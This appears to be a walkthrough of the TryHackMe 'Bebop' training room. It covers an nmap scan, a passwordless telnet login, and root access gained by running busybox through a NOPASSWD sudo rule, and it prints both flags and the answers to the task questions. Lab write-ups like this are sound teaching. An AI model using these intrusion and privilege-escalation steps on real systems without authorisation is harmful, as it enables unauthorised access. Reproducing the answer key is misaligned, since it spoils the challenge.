Today, we’re going work our way through another TryHackMe room called Bebop. This one isn’t in the Free Tier, but it is considered “Easy” and is a “Walkthrough Room” rather than a “Challenge Room”. Because of that, there will be some additional questions in addition to just posting User and Root flags. Getting started, the room description says, “Who thought making a flying shell was a good idea?”. For the first task, it reads, “For this mission, you have been assigned the codename ‘pilot’. Press the Start Machine button to make the drone takeoff!”.
Task 1
“Deploy the machine.” – No answer needed
“What is your codename?” – pilot
Task 2
With the machine started and enough time elapsed, I first ran an nmap scan to see what we were dealing with.
~# nmap -sCV -T4 10.10.194.21 Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-05 16:25 GMT Nmap scan report for 10.10.194.21 Host is up (0.0013s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0) | ssh-hostkey: | 2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA) | 256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA) |_ 256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519) 23/tcp open telnet BSD-derived telnetd MAC Address: 02:D4:65:95:48:91 (Unknown) Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.44 seconds
So, ports 22 (SSH) and 23 (telnet) are open. SSH is rarely the initial way in without any other information, so let’s try telnet, remembering our username of pilot that they’ve already told us and then asked us about. Connecting, I was asked for a login and I typed pilot. This immediately got me to an interactive session. So, they meant Easy easy on this one.
root@ip-10-10-235-128:~# telnet 10.10.194.21 Trying 10.10.194.21... Connected to 10.10.194.21. Escape character is '^]'. login: pilot Last login: Sat Oct 5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr 4 02:07:22 UTC 2019 Welcome to FreeBSD! Release Notes, Errata: https://www.FreeBSD.org/releases/ Security Advisories: https://www.FreeBSD.org/security/ FreeBSD Handbook: https://www.FreeBSD.org/handbook/ FreeBSD FAQ: https://www.FreeBSD.org/faq/ Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ FreeBSD Forums: https://forums.FreeBSD.org/ Documents installed with the system are in the /usr/local/share/doc/freebsd/ directory, or can be installed later with: pkg install en-freebsd-doc For other languages, replace "en" with a language code like de or fr. Show the version of FreeBSD installed: freebsd-version ; uname -a Please include that output and any error messages when posting questions. Introduction to manual pages: man man FreeBSD directory layout: man hier Edit /etc/motd to change this login announcement. Want to strip UTF-8 BOM(Byte Order Mark) from given files? sed -e '1s/^\xef\xbb\xbf//' < bomfile > newfile [pilot@freebsd ~]$
Doing an ls shows me that we can see the user.txt file in our directory and cat-ing it out gives us the first answer of Task 2.
Okay, so we’re already at a command prompt. No issues here.
[pilot@freebsd ~]$ ls
user.txt
[pilot@freebsd ~]$ cat user.txt
THM{r3m0v3_b3f0r3_fl16h7}
What is the User Flag? – THM{r3m0v3_b3f0r3_fl16h7}
Moving on, we need to see what we can do to elevate our privileges to root to get the root flag. One of the first things I usually do is sudo -l to see what we can run as sudo. Since we didn’t use a password to log in, we didn’t know the password if there was one. Luckily, it didn’t ask us one to run this command.
[pilot@freebsd ~]$ sudo -l
User pilot may run the following commands on freebsd:
(root) NOPASSWD: /usr/local/bin/busybox
Okay, so we can run the binary busybox with sudo as root with no password. Is that useful? This is where I check my favorite PrivEsc companion GTFOBins to see. You can find the entry for busybox here. Taking a small aside, busybox is a utility that you often find in embedded systems that contains its own implementations of things like ls, sh, mv, etc. In these systems, you can execute the commands by calling busybox {command}, or – quite often – the person who set up the system will symlink ls to just call busybox ls, like this: ln -s /bin/busybox /bin/ls, so you might not even know that busybox is involved. This would allow you to only have one binary instead of many, with an overall size savings.
In this case, that means if I call sudo busybox sh, I’ll get a shell opened as root, which is just what happened.
[pilot@freebsd ~]$ sudo busybox sh # whoami root
From there, we navigate to the root directory and cat out the file.
# cd /root
# ls
.bash_history .history .login root.txt
.cshrc .k5login .profile
# cat root.txt
THM{h16hw4y_70_7h3_d4n63r_z0n3}
What is the Root Flag? – THM{h16hw4y_70_7h3_d4n63r_z0n3}
Task 3
What is the low privilleged user? – pilot
What binary was used to escalate privileges? – busybox
What service was used to gain an initial shell? – telnet
Last question, we already knew from what we saw in our nmap scan and also at the dump of information at our login prompt, but you can always check this way from within the system itself.
# uname -a FreeBSD freebsd 11.2-STABLE FreeBSD 11.2-STABLE #0 r345837: Thu Apr 4 02:07:22 UTC 2019 root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64
What Operating System does the drone run? – FreeBSD
That’s it. The most basic of rooms, but a pretty good entry point into some basic recon and basic PrivEsc if you’re new to this.